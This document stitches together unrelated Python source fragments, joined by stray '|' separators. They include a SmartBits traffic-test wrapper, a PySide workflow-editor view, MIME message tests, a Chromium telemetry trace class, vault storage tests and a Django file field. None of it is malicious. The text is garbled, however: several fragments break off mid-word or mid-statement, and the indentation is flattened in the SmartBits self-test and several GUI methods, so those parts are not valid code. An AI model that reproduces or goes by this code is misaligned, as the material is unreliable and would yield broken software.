        for i in range(1, 4000):
            s.intToRoman(i)
if __name__ == '__main__':
unittest.main()
|
#!/usr/bin/python2.7
# -*- coding: utf-8 -*-
# vim:ts=4:sw=4:softtabstop=4:smarttab:expandtab
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This is a high-level object interface the the Smartbits test system. It
also imports all of the low-level API calls. These low-level wrapper
classes are automatically generated by SWIG. You must first install the
smartbitsmodule in order for this to work. The SWIG program wraps the the
smartlib C API and this smartbits package makes it available to the Python
programmer. This module also defines some utility functions.
"""
from pycopia.smartbits.SMARTBITS import *
from pycopia.smartbits.smartbits_struct import *
from pycopia.smartbits.smartbits_func import *
SmartlibError = smartbits_funcc.SmartlibError
class SmartbitsError(SmartlibError):
    # Package-level error type so callers can catch smartbits failures
    # without referencing the SWIG-generated SmartlibError directly.
    pass
# you can subclass smartlib structures and add methods!
class HTCount(HTCountStructure):
    # Python-side subclass of the SWIG counter structure; exists so helper
    # methods can be added without touching the generated wrapper.
    pass
# some helpful functions follow, borrowed from Smartlib sample C code.
def linkToSmartBits(ipaddr=None, port=16385):
    """Ensure a link to a SmartBits chassis, prompting for an IP if needed.

    Raises SmartbitsError when the socket link cannot be established.
    (Python 2 except/raise syntax — this module is Python 2 only.)
    """
    # ETGetLinkStatus will be positive if we're linked
    try:
        st = ETGetLinkStatus()
    except SmartlibError, err:
        # Not linked yet: ask for an address if none was given and connect.
        if not ipaddr:
            ipaddr = raw_input ("Enter IP address of SmartBits chassis ==> ")
        try:
            NSSocketLink(ipaddr,port,RESERVE_NONE)
        except SmartlibError, err:
            print_error_desc(err)
            raise SmartbitsError, err[0]
def resetCard(hub, slot, port):
    """
    HTResetPort resets card to power on defaults
    """
    HTResetPort(RESET_FULL, hub, slot, port)
def setFill(hub, slot, port, fill_len):
    """Configure the background fill pattern on a card.

    The first six bytes are 0xFF (a broadcast destination MAC); the
    remaining fill_len bytes are 0xAA filler.
    """
    broadcast_header = "\xFF" * 6
    payload = "\xAA" * fill_len
    pattern = broadcast_header + payload
    HTFillPattern(len(pattern), pattern, hub, slot, port)
def setVFD1(h1, s1, p1):
    """
    Sets up VFD1 to overwrite the source MAC area of the packet
    VFD 1 and 2 work like counters, will overwrite 1 to 6 bytes
    and can be set static, increment or decrement.
    Since we have set the fill to have FF FF FF FF FF FF in the first
    six bytes and this VFD has an offset of 48 bits it will overwrite the
    next six bytes with 66 55 44 33 22 11
    """
    vfdstruct = HTVFDStructure()
    # MAC will increment with each successive packet
    vfdstruct.Configuration = HVFD_INCR
    # will overwrite 6 bytes
    vfdstruct.Range = 6
    # 48 bits (6 bytes) after preamble - SOURCE MAC
    vfdstruct.Offset = 48
    # order is 0 = LSB - will produce a MAC address 66 55 44 33 22 11
    # XXX current interface uses pointers
    vfdData = ptrcreate("int",0,6)
    ptrset(vfdData, 0x11, 0)
    ptrset(vfdData, 0x22, 1)
    ptrset(vfdData, 0x33, 2)
    ptrset(vfdData, 0x44, 3)
    ptrset(vfdData, 0x55, 4)
    ptrset(vfdData, 0x66, 5)
    # Associate the data with the VFD structure
    vfdstruct.Data = vfdData
    # will increment 5 times then repeat LSB of Source MAC will
    # follow 11 12 13 14 15 11 12 pattern
    vfdstruct.DataCount = 5
    # send to config card
    HTVFD( HVFD_1, vfdstruct, h1, s1, p1)
    # SWIG pointer must be freed explicitly — no GC for ptrcreate memory.
    ptrfree(vfdData)
def setTrigger(h1, s1, p1):
    """Arm trigger 1 to match the base source-MAC pattern.

    VFD1 cycles through five MAC values before repeating, so this trigger
    fires on every fifth transmitted packet.
    """
    trigger = HTTriggerStructure()
    # Match starts 48 bits after the preamble (the source MAC field).
    trigger.Offset = 48
    # The match pattern is six bytes long.
    trigger.Range = 6
    # Bytes to match: 66 55 44 33 22 11 (LSB-first order).
    # XXX future interface, use typemaps to allow python list assignment to
    # memeber arrays.
    trigger.Pattern = [0x11, 0x22, 0x33, 0x44, 0x55, 0x66]
    # Push the trigger configuration down to the card.
    HTTrigger( HTTRIGGER_1, HTTRIGGER_ON, trigger, h1, s1, p1)
def clearCounters(h1, s1, p1):
    """
    clearCounters
    zero out the counters on the target Hub Slot Port
    """
    HTClearPort( h1, s1, p1)
def sendPackets(h1, s1, p1):
    """
    sendPackets
    HTRun will control transmission state of the card - with HTRUN mode it
    will start transmitting, with HTSTOP it will stop transmitting.
    A one second delay ensures the card has started transmitting, a while
    loop checks to ensure the card has stopped transmitting before exiting.
    The final 1 second wait allows time for the packets to get to the receive card.
    """
    # Start transmission - card will transmit at whatever mode it is set to
    HTRun( HTRUN, h1, s1, p1)
    cs = HTCountStructure()
    # Library 3.09 and higher includes delay function
    NSDelay(1)
    # Now wait until transmission stops
    HTGetCounters( cs, h1, s1, p1)
    while cs.TmtPktRate != 0:
        HTGetCounters( cs, h1, s1, p1)
    # NOTE(review): the source was garbled around the loop; per the
    # docstring, the "final 1 second wait" (for in-flight packets to reach
    # the receive card) belongs after the polling loop — confirm vs. the
    # original Smartlib sample code.
    NSDelay(1)
def promptForEnter():
    """
    promptForEnter
    Press Enter to continue procedure
    waits until user presses ENTER
    """
    # raw_input: Python 2 builtin (this module targets Python 2 only).
    raw_input("Press ENTER to continue.")
def showCounters(h1, s1, p1):
    """
    showCounters
    Display counts on target card. HTClearPort will clear counts.
    Card counters always run; there is no Start command for counters.
    Each element has a corresponding Rate (ie TmtPktRate, RcvPktRate, etc.)
    These counts will display the packets per second counts while the card
    is transmitting.
    """
    cs = HTCount()
    HTGetCounters( cs, h1, s1, p1)
    print "========================================="
    print "Counter Data Card", (s1 + 1)
    print "========================================="
    print " Transmitted Pkts  " , cs.TmtPkt
    print " Received Pkts     " , cs.RcvPkt
    print " Collisions        " , cs.Collision
    print " Received Triggers " , cs.RcvPkt
    print " CRC Errors        " , cs.CRC
    print " Alignment Errors  " , cs.Align
    print " Oversize Pkts     " , cs.Oversize
    print " Undersize Pkts    " , cs.Undersize
    print "========================================="
    promptForEnter()
def unlink():
    # Drop the link to the SmartBits chassis.
    ETUnLink()
####################################################################
# module self test. This is a translation from the 1stTest.c sample
# program.
if __name__ == "__main__":
import sys
hub1 = 0
slot1 = 0
port1 = 0
hub2 = 0
slot2 = 1
port2 = 0
numPackets = 100000
if len(sys.argv) > 1:
ipaddr = sys.argv[1]
else:
ipaddr = raw_input("Enter IP address of SmartBits chassis ==> ")
try:
ETSocketLink(ipaddr, 16385)
except Exception, err:
print "Error linking to chassis:", err
sys.exit()
print "successfully linked"
# reset cards
HTResetPort(RESET_FULL, hub1, slot1, port1)
HTResetPort(RESET_FULL, hub2, slot2, port2)
# clear counters
HTClearPort(hub1, slot1, port1)
HTClearPort(hub2, slot2, port2)
# set transmission parameters, single burst of numPackets packets
HTTransmitMode(SINGLE_BURST_MODE,hub1,slot1,port1)
HTBurstCount(numPackets,hub1,slot1,port1)
# start transmitting from the first card
HTRun(HTRUN,hub1,slot1,port1)
# you could need a delay here before reading counter data
raw_input("Press ENTER key to get counts.")
# get the transmit counts from card1 then the receive counts from card2
cs = HTCountStructure()
HTGetCounters(cs, hub1, slot1, port1)
txPackets = cs.TmtPkt
HTGetCounters(cs, hub2, slot2, port2)
rxPackets = cs.RcvPkt
if txPackets == rxPackets:
print "Test Passed! %d packets transmitted and %d packets received." % (txPackets, rxPackets)
else:
print "Test Failed! %d packets transmitted and %d packets received." % (txPackets, rxPackets)
ETUn |
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with MAP Client. If not, see <http://www.gnu.org/licenses/>.
'''
import sys, math
from PySide import QtCore, QtGui
from mapclient.mountpoints.workflowstep import workflowStepFactory
from mapclient.widgets.workflowcommands import CommandSelection, CommandRemove, CommandAdd, CommandMove
from mapclient.core.workflowscene import MetaStep
from mapclient.widgets.workflowgraphicsitems import Node, Arc, ErrorItem, ArrowLine, StepPort
class WorkflowGraphicsView(QtGui.QGraphicsView):
    def __init__(self, parent=None):
        """Set up selection/connection state, the error-icon timer and view rendering."""
        QtGui.QGraphicsView.__init__(self, parent)
        # Nodes currently selected; used to auto-connect when exactly two are selected.
        self._selectedNodes = []
        # Single-shot timer that removes the transient connection-error icon.
        self._errorIconTimer = QtCore.QTimer()
        self._errorIconTimer.setInterval(2000)
        self._errorIconTimer.setSingleShot(True)
        self._errorIconTimer.timeout.connect(self.errorIconTimeout)
        self._errorIcon = None
        self._undoStack = None
        self._location = ''
        # In-progress drag-to-connect line and its source port.
        self._connectLine = None
        self._connectSourceNode = None
        # Mouse position at press time, used to record a move macro on release.
        self._selectionStartPos = None
        self.setCacheMode(QtGui.QGraphicsView.CacheBackground)
        self.setRenderHint(QtGui.QPainter.Antialiasing)
        grid_pic = QtGui.QPixmap(':/workflow/images/grid.png')
        self._grid_brush = QtGui.QBrush(grid_pic)
        # self.setTransformationAnchor(QtGui.QGraphicsView.AnchorUnderMouse)
        # self.setResizeAnchor(QtGui.QGraphicsView.AnchorViewCenter)
        self.setAcceptDrops(True)
    def clear(self):
        """Remove all items from the scene."""
        self.scene().clear()
    def setUndoStack(self, stack):
        """Set the QUndoStack all edit commands are pushed onto."""
        self._undoStack = stack
    def setLocation(self, location):
        """Set the workflow location used when instantiating steps on drop."""
        self._location = location
    def connectNodes(self, node1, node2):
        """Try to connect node1 to node2; on failure flash an error icon.

        A successful connection is pushed onto the undo stack as an Arc.
        The error icon is removed by the single-shot timer (or immediately,
        if a previous icon is still showing when a new failure occurs).
        """
        # Check if nodes are already connected
        if not node1.hasArcToDestination(node2):
            if node1.canConnect(node2):
                command = CommandAdd(self.scene(), Arc(node1, node2))
                self._undoStack.push(command)
            else:
                # add temporary line ???
                # Clear any previous error icon before showing a new one;
                # the order (stop timer, remove icon, add icon, restart)
                # matters so only one icon is ever in the scene.
                if self._errorIconTimer.isActive():
                    self._errorIconTimer.stop()
                    self.errorIconTimeout()
                self._errorIcon = ErrorItem(node1, node2)
                self.scene().addItem(self._errorIcon)
                self._errorIconTimer.start()
def selectionChanged(self):
currentSelection = self.scene().selectedItems()
previousSelection = self.scene().previouslySelectedItems()
command = CommandSelection(self.scene(), currentSelection, previousSelection)
self._undoStack.push(command)
self.scene().setPreviouslySelectedItems(currentSelection)
def nodeSelected(self, node, state):
if state == True and node not in self._selectedNodes:
self._selectedNodes.append(node)
elif state == False and node in self._selectedNodes:
found = self._selectedNodes.index(node)
del self._selectedNodes[found]
if len(self._selectedNodes) == 2:
self.connectNodes(self._selectedNodes[0], self._selectedNodes[1])
def keyPressEvent(self, event):
# super(WorkflowGraphicsView, self).keyPressEvent(event)
if event.key() == QtCore.Qt.Key_Backspace or event.key() == QtCore.Qt.Key_Delete:
command = CommandRemove(self.scene(), self.scene().selectedItems())
self._undoStack.push(command)
event.accept()
else:
event.ignore()
    def contextMenuEvent(self, event):
        """Show the step's context menu when right-clicking on a Node item."""
        item = self.itemAt(event.pos())
        if item and item.type() == Node.Type:
            item.showContextMenu(event.globalPos())
    def mousePressEvent(self, event):
        """Start a drag-to-connect on a StepPort, otherwise default handling.

        Right button is ignored so contextMenuEvent can handle it.  For any
        other press the event goes to the base class (selection/drag) and the
        position is remembered to record a move macro on release.
        """
        item = self.scene().itemAt(self.mapToScene(event.pos()))
        if event.button() == QtCore.Qt.RightButton:
            event.ignore()
        elif item and item.type() == StepPort.Type:
            # Anchor a rubber-band arrow at the port's centre.
            centre = item.boundingRect().center()
            self._connectSourceNode = item
            self._connectLine = ArrowLine(QtCore.QLineF(item.mapToScene(centre),
                                         self.mapToScene(event.pos())))
            self.scene().addItem(self._connectLine)
        else:
            QtGui.QGraphicsView.mousePressEvent(self, event)
            self._selectionStartPos = event.pos()
def mouseMoveEvent(self, event):
if s | elf._connectLine:
newLine = QtCore.QLineF(self._connectLine.line().p1(), self.mapToScene(event.pos()))
self._connectLine.setLine(newLine)
else:
QtGui.QGraphicsView.mouseMoveEvent(self, event)
    def mouseReleaseEvent(self, event):
        """Finish a drag-to-connect, or record the completed move as a macro."""
        if self._connectLine:
            # Connect only if released over another StepPort; either way the
            # temporary arrow line is removed.
            item = self.scene().itemAt(self.mapToScene(event.pos()))
            if item and item.type() == StepPort.Type:
                self.connectNodes(self._connectSourceNode, item)
            self.scene().removeItem(self._connectLine)
            self._connectLine = None
            self._connectSourceNode = None
        else:
            QtGui.QGraphicsView.mouseReleaseEvent(self, event)
            if self._selectionStartPos:
                diff = event.pos() - self._selectionStartPos
                # NOTE(review): `and` means a purely horizontal or purely
                # vertical drag records no move macro -- possibly intended
                # to be `or`; confirm before changing.
                if diff.x() != 0 and diff.y() != 0:
                    self._undoStack.beginMacro('Move Step(s)')
                    for item in self.scene().selectedItems():
                        if item.type() == Node.Type:
                            self._undoStack.push(CommandMove(item, item.pos() - diff, item.pos()))
                    self._undoStack.endMacro()
def errorIconTimeout(self):
self.scene().removeItem(self._errorIcon)
del self._errorIcon
    def changeEvent(self, event):
        """Repaint the whole scene when the view's enabled state changes."""
        if event.type() == QtCore.QEvent.EnabledChange:
            self.invalidateScene(self.sceneRect())
def drawBackground(self, painter, rect):
# Shadow.
sceneRect = self.sceneRect()
rightShadow = QtCore.QRectF(sceneRect.right(), sceneRect.top() + 5, 5, sceneRect.height())
bottomShadow = QtCore.QRectF(sceneRect.left() + 5, sceneRect.bottom(), sceneRect.width(), 5)
if rightShadow.intersects(rect) or rightShadow.contains(rect):
painter.fillRect(rightShadow, QtCore.Qt.darkGray)
if bottomShadow.intersects(rect) or bottomShadow.contains(rect):
painter.fillRect(bottomShadow, QtCore.Qt.darkGray)
painter.setBrush(self._grid_brush) # QtCore.Qt.NoBrush
painter.drawRect(sceneRect)
    def dropEvent(self, event):
        """Create a workflow step Node from a dragged step palette entry.

        The mime payload is read in the exact order it was written:
        hotspot-adjusted name length, name bytes, then the hotspot point.
        The add and the position move are grouped in one undo macro.
        """
        if event.mimeData().hasFormat("image/x-workflow-step"):
            pieceData = event.mimeData().data("image/x-workflow-step")
            stream = QtCore.QDataStream(pieceData, QtCore.QIODevice.ReadOnly)
            hotspot = QtCore.QPoint()
            nameLen = stream.readUInt32()
            name = stream.readRawData(nameLen).decode(sys.stdout.encoding)
            stream >> hotspot
            scene = self.scene()
            position = self.mapToScene(event.pos() - hotspot)
            metastep = MetaStep(workflowStepFactory(name, self._location))
            node = Node(metastep)
            # Wire the step's lifecycle callbacks into the scene.
            metastep._step.registerConfiguredObserver(scene.stepConfigured)
            metastep._step.registerDoneExecution(scene.doneExecution)
            metastep._step.registerOnExecuteEntry(scene.setCurrentWidget)
            metastep._step.registerIdentifierOccursCount(scene.identifierOccursCount)
            self._undoStack.beginMacro('Add node')
            self._undoStack.push(CommandAdd(scene, node))
            # Set the position after it has been added to the scene
            self._undoStack.push(CommandMove(node, position, scene.ensureItemInScene(node, position)))
            scene.clearSelection()
            node.setSelected(True)
            self._undoStack.endMacro()
            self.setFocus()
            event.accept()
        else:
            event.ignore()
def dragMoveEvent(self, event):
if event.mimeData(). |
ate.from_string(IPHONE)
parts = list(message.walk())
message = create.from_message(parts[2])
eq_(u'\n\n\n~Danielle', message.body)
def message_from_garbage_test():
    """from_string must reject non-string garbage with DecodingError."""
    for garbage in (None, [], MimePart):
        assert_raises(errors.DecodingError, create.from_string, garbage)
def create_singlepart_ascii_test():
    """Plain ASCII text round-trips with 7bit transfer encoding."""
    built = create.text("plain", u"Hello")
    parsed = create.from_string(built.to_string())
    eq_("7bit", parsed.content_encoding.value)
    eq_("Hello", parsed.body)
def create_singlepart_unicode_test():
    """Non-ASCII text round-trips with base64 transfer encoding."""
    built = create.text("plain", u"Привет, курилка")
    parsed = create.from_string(built.to_string())
    eq_("base64", parsed.content_encoding.value)
    eq_(u"Привет, курилка", parsed.body)
def create_singlepart_ascii_long_lines_test():
    """Over-long ASCII lines force quoted-printable; newlines are preserved."""
    very_long = "very long line " * 1000 + "preserve my newlines \r\n\r\n"
    built = create.text("plain", very_long)
    parsed = create.from_string(built.to_string())
    eq_("quoted-printable", parsed.content_encoding.value)
    eq_(very_long, parsed.body)
    # Cross-check with the stdlib parser.
    stdlib_msg = email.message_from_string(built.to_string())
    eq_(very_long, stdlib_msg.get_payload(decode=True))
def create_multipart_simple_test():
    """A two-part multipart/mixed round-trips through both our parser and stdlib email."""
    message = create.multipart("mixed")
    message.append(
        create.text("plain", "Hello"),
        create.text("html", "<html>Hello</html>"))
    ok_(message.is_root())
    assert_false(message.parts[0].is_root())
    assert_false(message.parts[1].is_root())
    message2 = create.from_string(message.to_string())
    eq_(2, len(message2.parts))
    eq_("multipart/mixed", message2.content_type)
    eq_(2, len(message.parts))
    eq_("Hello", message.parts[0].body)
    eq_("<html>Hello</html>", message.parts[1].body)
    # Cross-check the serialized form with the stdlib parser.
    message2 = email.message_from_string(message.to_string())
    eq_("multipart/mixed", message2.get_content_type())
    eq_("Hello", message2.get_payload()[0].get_payload(decode=False))
    eq_("<html>Hello</html>",
        message2.get_payload()[1].get_payload(decode=False))
def create_multipart_with_attachment_test():
    """A binary attachment with a long non-ASCII filename survives a round trip."""
    message = create.multipart("mixed")
    filename = u"Мейлган картиночка картиночечка с длинным именем и пробельчиками"
    message.append(
        create.text("plain", "Hello"),
        create.text("html", "<html>Hello</html>"),
        create.binary(
            "image", "png", MAILGUN_PNG,
            filename, "attachment"))
    eq_(3, len(message.parts))
    message2 = create.from_string(message.to_string())
    eq_(3, len(message2.parts))
    # Binary payload goes out base64 and the filename appears in both
    # Content-Disposition and Content-Type.
    eq_("base64", message2.parts[2].content_encoding.value)
    eq_(MAILGUN_PNG, message2.parts[2].body)
    eq_(filename, message2.parts[2].content_disposition.params['filename'])
    eq_(filename, message2.parts[2].content_type.params['name'])
    ok_(message2.parts[2].is_attachment())
    message2 = email.message_from_string(message.to_string())
    eq_(3, len(message2.get_payload()))
    eq_(MAILGUN_PNG, message2.get_payload()[2].get_payload(decode=True))
def create_multipart_with_text_non_unicode_attachment_test():
    """Make sure we encode a non-unicode text attachment in base64
    and decode its body back to unicode on parse.
    """
    message = create.multipart("mixed")
    filename = "text-attachment.txt"
    message.append(
        create.text("plain", "Hello"),
        create.text("html", "<html>Hello</html>"),
        create.binary(
            "text", "plain", u"Саша с уралмаша".encode("koi8-r"),
            filename, "attachment"))
    message2 = create.from_string(message.to_string())
    eq_(3, len(message2.parts))
    attachment = message2.parts[2]
    ok_(attachment.is_attachment())
    eq_("base64", attachment.content_encoding.value)
    eq_(u"Саша с уралмаша", attachment.body)
def create_multipart_with_text_non_unicode_attachment_preserve_encoding_test():
    """Make sure we encode text attachment in base64
    and also preserve charset information (koi8-r here).
    """
    message = create.multipart("mixed")
    filename = "text-attachment.txt"
    message.append(
        create.text("plain", "Hello"),
        create.text("html", "<html>Hello</html>"),
        create.text(
            "plain",
            u"Саша с уралмаша 2".encode("koi8-r"),
            "koi8-r",
            "attachment",
            filename))
    message2 = create.from_string(message.to_string())
    eq_(3, len(message2.parts))
    attachment = message2.parts[2]
    ok_(attachment.is_attachment())
    eq_("base64", attachment.content_encoding.value)
    # The declared charset must survive the round trip.
    eq_("koi8-r", attachment.charset)
    eq_(u"Саша с уралмаша 2", attachment.body)
def create_multipart_nested_test():
    """A multipart/alternative nested inside multipart/mixed round-trips intact."""
    message = create.multipart("mixed")
    nested = create.multipart("alternative")
    nested.append(
        create.text("plain", u"Саша с уралмаша"),
        create.text("html", u"<html>Саша с уралмаша</html>"))
    message.append(
        create.text("plain", "Hello"),
        nested)
    message2 = create.from_string(message.to_string())
    eq_(2, len(message2.parts))
    eq_('text/plain', message2.parts[0].content_type)
    eq_('Hello', message2.parts[0].body)
    eq_(u"Саша с уралмаша", message2.parts[1].parts[0].body)
    eq_(u"<html>Саша с уралмаша</html>", message2.parts[1].parts[1].body)
def create_enclosed_test():
    """A message wrapped in a message/rfc822 container keeps its body and headers."""
    message = create.text("plain", u"Превед")
    message.headers['From'] = u' Саша <sasha@mailgun.net>'
    message.headers['To'] = u'Женя <ev@mailgun.net>'
    message.headers['Subject'] = u"Все ли ок? Нормальненько??"
    message = create.message_container(message)
    message2 = create.from_string(message.to_string())
    eq_('message/rfc822', message2.content_type)
    eq_(u"Превед", message2.enclosed.body)
    # Note the leading space in the original From value is normalized away.
    eq_(u'Саша <sasha@mailgun.net>', message2.enclosed.headers['From'])
def create_enclosed_nested_test():
    """A multipart/alternative enclosed in message/rfc822, next to a large JSON part."""
    nested = create.multipart("alternative")
    nested.append(
        create.text("plain", u"Саша с уралмаша"),
        create.text("html", u"<html>Саша с уралмаша</html>"))
    message = create.multipart("mailgun-recipient-variables")
    variables = {"a": u"<b>Саша</b>" * 1024}
    message.append(
        create.binary("application", "json", json.dumps(variables)),
        create.message_container(nested))
    message2 = create.from_string(message.to_string())
    eq_(variables, json.loads(message2.parts[0].body))
    nested = message2.parts[1].enclosed
    eq_(2, len(nested.parts))
    eq_(u"Саша с уралмаша", nested.parts[0].body)
    eq_(u"<html>Саша с уралмаша</html>", nested.parts[1].body)
def guessing_attachments_test():
    """create.binary guesses the real content type from payload/filename
    when given the generic application/octet-stream."""
    binary = create.binary(
        "application", 'octet-stream', MAILGUN_PNG, '/home/alex/mailgun.png')
    eq_('image/png', binary.content_type)
    eq_('mailgun.png', binary.content_type.params['name'])
    binary = create.binary(
        "application", 'octet-stream',
        MAILGUN_PIC, '/home/alex/mailgun.png', disposition='attachment')
    eq_('attachment', binary.headers['Content-Disposition'].value)
    eq_('mailgun.png', binary.headers['Content-Disposition'].params['filename'])
    binary = create.binary(
        "application", 'octet-stream', NOTIFICATION, '/home/alex/mailgun.eml')
    eq_('message/rfc822', binary.content_type)
    binary = create.binary(
        "application", 'octet-stream', MAILGUN_WAV, '/home/alex/audiofile.wav')
    eq_('audio/x-wav', binary.content_type)
def attaching_emails_test():
    """Attached emails are recognized as message/rfc822, whether declared or guessed."""
    attachment = create.attachment(
        "message/rfc822", MULTIPART, "message.eml", "attachment")
    eq_("message/rfc822", attachment.content_type)
    ok_(attachment.is_attachment())
    # now guess by file name
    attachment = create.attachment(
        "application/octet-stream", MULTIPART, "message.eml", "attachment")
    eq_("message/rfc822", attachment.content_type)
def attaching_broken_emails_test():
    """An unparsable email attachment falls back to application/octet-stream."""
    attachment = create.attachment(
        "application/octet-stream", FALSE_MULTIPART, "message.eml", "attachment")
    ok_(attachment.is_attachment())
    eq_("application/octet-stream", attachment.content_type)
def attaching_images_test():
attachment = create.attachment(
"application/octet-stream", MAILGUN_PNG, "/home/alex/mailgun.png") |
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import datetime
import logging
import os
import random
import shutil
import StringIO
import sys
import tempfile
from catapult_base import cloud_storage # pylint: disable=import-error
from telemetry.internal.util import file_handle
from telemetry.timeline import trace_data as trace_data_module
from telemetry import value as value_module
from tracing_build import trace2html
class TraceValue(value_module.Value):
  def __init__(self, page, trace_data, important=False, description=None):
    """A value that contains a TraceData object and knows how to
    output it.

    Adding TraceValues and outputting as JSON will produce a directory full of
    HTML files called trace_files. Outputting as chart JSON will also produce
    an index, files.html, linking to each of these files.
    """
    super(TraceValue, self).__init__(
        page, name='trace', units='', important=important,
        description=description, tir_label=None)
    self._temp_file = self._GetTempFileHandle(trace_data)
    self._cloud_url = None
    self._serialized_file_handle = None

  def _GetTempFileHandle(self, trace_data):
    """Render trace_data to a standalone HTML temp file and return its handle."""
    if self.page:
      title = self.page.display_name
    else:
      title = ''
    content = StringIO.StringIO()
    trace2html.WriteHTMLForTraceDataToFile(
        [trace_data.GetEventsFor(trace_data_module.CHROME_TRACE_PART)],
        title,
        content)
    # delete=False: the handle outlives this function; CleanUp() removes it.
    tf = tempfile.NamedTemporaryFile(delete=False, suffix='.html')
    tf.write(content.getvalue().encode('utf-8'))
    tf.close()
    return file_handle.FromTempFile(tf)

  def __repr__(self):
    if self.page:
      page_name = self.page.display_name
    else:
      page_name = 'None'
    return 'TraceValue(%s, %s)' % (page_name, self.name)

  def CleanUp(self):
    """Cleans up tempfile after it is no longer needed.

    A cleaned up TraceValue cannot be used for further operations. CleanUp()
    may be called more than once without error.
    """
    if self._temp_file is None:
      return
    os.remove(self._temp_file.GetAbsPath())
    self._temp_file = None

  def __enter__(self):
    return self

  def __exit__(self, _, __, ___):
    self.CleanUp()

  @property
  def cleaned_up(self):
    return self._temp_file is None

  def GetBuildbotDataType(self, output_context):
    # Traces are not charted by buildbot.
    return None

  def GetBuildbotValue(self):
    return None

  def GetRepresentativeNumber(self):
    return None

  def GetRepresentativeString(self):
    return None

  @staticmethod
  def GetJSONTypeName():
    return 'trace'

  @classmethod
  def MergeLikeValuesFromSamePage(cls, values):
    # Only the first trace of a page is kept.
    assert len(values) > 0
    return values[0]

  @classmethod
  def MergeLikeValuesFromDifferentPages(cls, values):
    return None

  def AsDict(self):
    if self._temp_file is None:
      raise ValueError('Tried to serialize TraceValue without tempfile.')
    d = super(TraceValue, self).AsDict()
    if self._serialized_file_handle:
      d['file_id'] = self._serialized_file_handle.id
    if self._cloud_url:
      d['cloud_url'] = self._cloud_url
    return d

  def Serialize(self, dir_path):
    """Copy the trace HTML into dir_path and return the new file handle."""
    if self._temp_file is None:
      raise ValueError('Tried to serialize nonexistent trace.')
    file_name = str(self._temp_file.id) + self._temp_file.extension
    file_path = os.path.abspath(os.path.join(dir_path, file_name))
    shutil.copy(self._temp_file.GetAbsPath(), file_path)
    self._serialized_file_handle = file_handle.FromFilePath(file_path)
    return self._serialized_file_handle

  def UploadToCloud(self, bucket):
    """Upload the (serialized, if available) trace file and return its URL.

    Returns None if the upload is rejected with a permission error.
    """
    if self._temp_file is None:
      raise ValueError('Tried to upload nonexistent trace to Cloud Storage.')
    try:
      if self._serialized_file_handle:
        fh = self._serialized_file_handle
      else:
        fh = self._temp_file
      remote_path = ('trace-file-id_%s-%s-%d%s' % (
          fh.id,
          datetime.datetime.now().strftime('%Y-%m-%d_%H-%M-%S'),
          random.randint(1, 100000),
          fh.extension))
      self._cloud_url = cloud_storage.Insert(
          bucket, remote_path, fh.GetAbsPath())
      sys.stderr.write(
          'View generated trace files online at %s for page %s\n' %
          (self._cloud_url, self.page.url if self.page else 'unknown'))
      return self._cloud_url
    except cloud_storage.PermissionError as e:
      # Fix: pass the argument lazily to logging instead of eagerly
      # %-formatting, and avoid the deprecated Exception.message attribute.
      logging.error('Cannot upload trace files to cloud storage due to '
                    ' permission error: %s', e)
|
import unittest
import os
from nose.tools import assert_true
from nose.tools import assert_false
from pyvault import PyVault
from pyvault.backends.file import PyVaultFileBackend
from pyvault.backends.ptree import PyVaultPairtreeBackend
class VaultStore(unittest.TestCase):
    """
    testing storing data into the vault with different
    backends and their resulting files.

    The long hex names below are the backend's derived storage key for
    the logical key "key"; the pairtree backend shards the same digest
    into two-character path segments.
    """
    def test_store_file(self):
        # Flat-file backend: one file per secret under the store root.
        backend = PyVaultFileBackend("/tmp/_pyvault_file")
        vault = PyVault(backend)
        vault.unlock("passphrase", False)
        assert_false(vault.is_locked())
        vault.store("key", "secret")
        assert_true(os.path.isfile("/tmp/_pyvault_file/8335fa56d487562de248f47befc72743334051ddffcc2c09275f665454990317594745ee17c08f798cd7dce0ba8155dcda14f6398c1d1545116520a133017c09"))
    def test_store_ptree(self):
        # Pairtree backend: digest split into 2-char directories, data in obj/data.
        backend = PyVaultPairtreeBackend("/tmp/_pyvault_ptree")
        vault = PyVault(backend)
        vault.unlock("passphrase", False)
        assert_false(vault.is_locked())
        vault.store("key", "secret")
        assert_true(os.path.isfile("/tmp/_pyvault_ptree/pairtree_root/83/35/fa/56/d4/87/56/2d/e2/48/f4/7b/ef/c7/27/43/33/40/51/dd/ff/cc/2c/09/27/5f/66/54/54/99/03/17/59/47/45/ee/17/c0/8f/79/8c/d7/dc/e0/ba/81/55/dc/da/14/f6/39/8c/1d/15/45/11/65/20/a1/33/01/7c/09/obj/data"))
|
import datetime
import os
from django.db.models.fields.files import FileField
from django.core.files.storage import default_storage
from django.utils.encoding import force_unicode, smart_str
class ModelUploadFileField(FileField):
    """
    Makes the upload_to parameter optional by using the name of the model.

    '$$MODEL$$' is a placeholder that is replaced with the owning model's
    verbose_name the first time a filename is generated.
    """
    def __init__(self, verbose_name=None, name=None, storage=None, **kwargs):
        for arg in ('primary_key', 'unique'):
            if arg in kwargs:
                raise TypeError("'%s' is not a valid argument for %s." % (arg, self.__class__))
        self.storage = storage or default_storage
        # Default (and empty) upload_to to the model-name placeholder.
        upload_to = kwargs.pop('upload_to', '$$MODEL$$')
        if not upload_to:
            upload_to = '$$MODEL$$'
        self.upload_to = upload_to
        if callable(upload_to):
            self.generate_filename = upload_to
        kwargs['max_length'] = kwargs.get('max_length', 100)
        # NOTE(review): deliberately calls FileField's *parent* __init__,
        # skipping FileField.__init__ (which would re-require upload_to) --
        # confirm this still holds for the targeted Django version.
        super(FileField, self).__init__(verbose_name, name, **kwargs)
    def get_directory_name(self):
        # upload_to may contain strftime() placeholders; expand them now.
        return os.path.normpath(force_unicode(datetime.datetime.now().strftime(smart_str(self.upload_to))))
    def generate_filename(self, instance, filename):
        # NOTE(review): mutates self.upload_to on first use; the field
        # instance is shared by the model class, so the first instance's
        # verbose_name sticks -- presumably identical for all instances.
        if self.upload_to == '$$MODEL$$':
            self.upload_to = instance._meta.verbose_name
